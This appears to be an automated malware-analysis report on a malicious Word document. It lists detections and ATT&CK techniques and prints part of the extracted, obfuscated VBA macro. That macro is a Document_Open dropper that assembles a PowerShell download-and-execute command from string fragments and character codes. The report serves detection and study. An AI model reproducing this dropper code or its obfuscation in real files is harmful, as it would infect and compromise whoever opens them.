MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers the execution of a PowerShell command, which is obfuscated within the VBA code. This PowerShell command is designed to download and execute a second-stage payload from a benign-looking URL, which is highly suspicious. The ClamAV detection further confirms its malicious nature.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6608821-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6608821-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52747 bytes |

SHA-256: 267ba0069fafdd6134314f6bf74d43f1cc7fcb3770967fcc667225cb3c11e271
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "BbNOhYUipB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jrIEw = QiwnF / wJsFj + (qnwPW - wIDkN / (35832 - 4421 + fZkPi - wikEH))
sHVDL = FTTsN / FQQvsN + (dEniQ - ziZoS / (30403 - 61733 + XRMwh - nzMzlX))
tPSOh = Application.Run("nnYMLmYRVC", "" + FwRuaoXaJUUl + FfQdlwlWYcbKI + woSmvc + KAscvzY + SZFdQvZLv + FaNzPzi + PrbiQa + mHhRLzuFGB + mbNqFvIawX + BPBiQHklNan + XXliXjZU + EObfIX + wiNzMsZsr + WjEbnWAjDc + AjlNDirku + hWVPiajkjIk + MbrbhE + hHIaZbjt + tEjAm + iwQrTSFRwRT + Hhizziw + FhLUjfAchWh)
OYQJBm = mVCLi / JLtkD + (TVNVM - BiUwwh / (54806 - 84475 + EIjwoD - UiiLCb))
wLPVd = qssKSc / GkSjk + (Mitzl - ThwIp / (79525 - 98746 + DlXhi - FNkMX))
UAJCaW = DDYzD / nXVimb + (DNlPR - AfnAiZ / (83486 - 51687 + wXaRDD - cZozE))
End Sub
Attribute VB_Name = "McQAmqGO"
Function woSmvc()
On Error Resume Next
dAOTz = tRFEV * sImui + (JkLIU * FNlKEw)
VdjfSS = "" + KhlJwYzpUTdr + YaruTLE + "POw" + jlNjTiMIsC + aAljjMvqorks + "ersh" + jNCsGfSM + kpiGHLlpjW + "eL" + GNkzJAjpAV + zzFzwBOO + "l " + vuioicFvL + JHoHHVRfQ + " " + Chr(34) + "(" + PXHHGlsfH + tSqRURDjEJm + " ( 3" + sQsofzifpjiLh + UDffjfOWRq + "6," + cjSFcfRPptEAKA + lLGnqhO + " 7" + GKJitawizGw + BfPLjbwfVjj + "5 " + GkNIuSQcVUHk + GWNuAfLJa + ",8" + AnDwlidTJUN + LjGwjKHblIsII + "3 , "
woSmvc = "" + iZwJodtiNdk + RmwsFYiUZMd + VdjfSS
EPfKp = (55398 * zojXEc)
End Function
Function KAscvzY()
On Error Resume Next
sUvUd = (19048 * JACjDL)
vHbXqJsXmq = "" + tYZizDoHz + DaodOQSjsiv + "116 "
RVJmtq = (74071 * WEKEkn)
Ksqqkq = "" + nXwhviMZVms + kzkfNdtBOH + ",61" + jWdZddQqLuYqM + zNYDuJBTNTFZ + " ,11" + iYQCoOMjzrIbiI + tSrrvoqDzj + "0 ," + QFYDsuh + oYHaONjv + " 101" + sdoZmihAqiM + jJStSEj + " ,1" + UQEujQhaJHj + ZbflVKuqnvmT + "19" + vTNqjnQJY + wQSPYEVwwkrNh + ",45 " + tkjUSaLzmG + zUVPDKtWt + ", 11" + PqRWcjEFjGL + dEDRnRjIcnX + "1," + UnDnMiRJRdA + ThAOKmZpmzHb + " 98,"
aYFNf = wKYaHq - dbHhQ / HihBuE + qhJsM + (61024 / RHQqw / 95709 * YhGwz)
vSmDtt = LQCtu - dWLaCN / wwHOc + DkiovL + (56412 / VriZH / 19024 * HRwVQG)
wcCGjCpuv = "" + qrnzcootWKJ + PAfObjwVKQjSG + " 106" + aCukEMqSEMDTcO + oojIjbjYjSI + " ," + EjVErTUPYFb + aCYQWHQkviWa + " 101" + SWBlELsAfhOluZ + iIjwAjzTw + " ,9" + pICziaTBs + XNpZXqBkNr + "9, " + vNqSwlXhpDw + dikLaXYrPlWJb + "116," + RLnXWdGl + VQVqiTRm + "32 " + IRZmTuojcUIXcN + QYjOXwzDFHD + ", 78" + REWtOBAmBEbo + SzznHaAD + ",10" + SXLUVjMr + LPliNMOrOTEazn + "1, 1" + HTvakOL + rpjQUrjCdzD + "16,"
oqSAws = EZdht - hUFjOc / AvzjXR + VDFrc + (98912 / jhBocz / 43763 * altfpj)
avLIo = CsZYp - ZtvML / EVDVWi + ucUXUp + (52228 / nszObZ / 73554 * iRQqw)
zXfwmW = "" + cWJzssichkvB + FuSBmEumiPNV + "46 ," + rcbHrXPGqjooS + NbmHAolWiaInpr + "87," + XhtkEIoJvVwE + wlirRoaN + " 10" + GGwjjka + wRHZaqEmdLiqjj + "1 ," + WEwaFJJWsiw + ZKvjHqvq + " 98," + AMBzBjKZ + ENjboqmHkjw + "67 ," + fDBiGZtWlKwzN + HphEbjCM + " 108" + vRDnGfLITV + zDAcITD + " , 1" + alaAuzsQMcr + LHpifilpu + "05" + GrdDwXjJu + fdnLjTrHsB + ", 1" + ssnanYwpjDHt + oRoticZpcL + "01,1"
jVaVm = SElIX - NmEroc / Qfiwl + ZVnVs + (76928 / TYRzAh / 66756 * QzicHJ)
haAApA = nnXTq - cziukQ / KOHvPj + OaATbC + (41457 / jCQlf / 14938 * tUaWso)
wSzmp = cIlKL - vkvzpc / tIKiZ + zTAJC + (31591 / jTZjst / 25381 * QukdGr)
iSFhSCJhH = "" + iiQfdWEXp + zfjtUjipV + "10" + GtJzhzViKBPWm + IqBMaLjVBl + ",1" + HXfilKsbXWdp + LqMiIwj + "16," + nnIffaYHOTN + iSiMuhA + " 59 " + MHZApITd + KwrvcfM + ",3" + PPVsnELuEwCCwp + BFikPolBLDJ + "6 ,8" + BhhjBWzqOm + OOjPzNHRTbZ + "2 " + jadUjkvYX + UWuSckmTj + ",89," + ZElLpCV + IzPSwUVhCAF + " 122"
mMHHCW = LaWqTf - koPJW / ntmYiV + rETBqZ + (26679 / rJbzof / 52003 * MfuBB)
SvdTo = ioFwKh - ZjVus / UcGUG + VIPERj + (760 / OmpiW / 26131 * UlCBFl)
OIwVkdqhr = "" + vPJHsaidhXrG + AtRqsioMhG + " , 6" + atkTwpqhGbQ + RbwQRnUIrfBk + "1,3
```

... (truncated)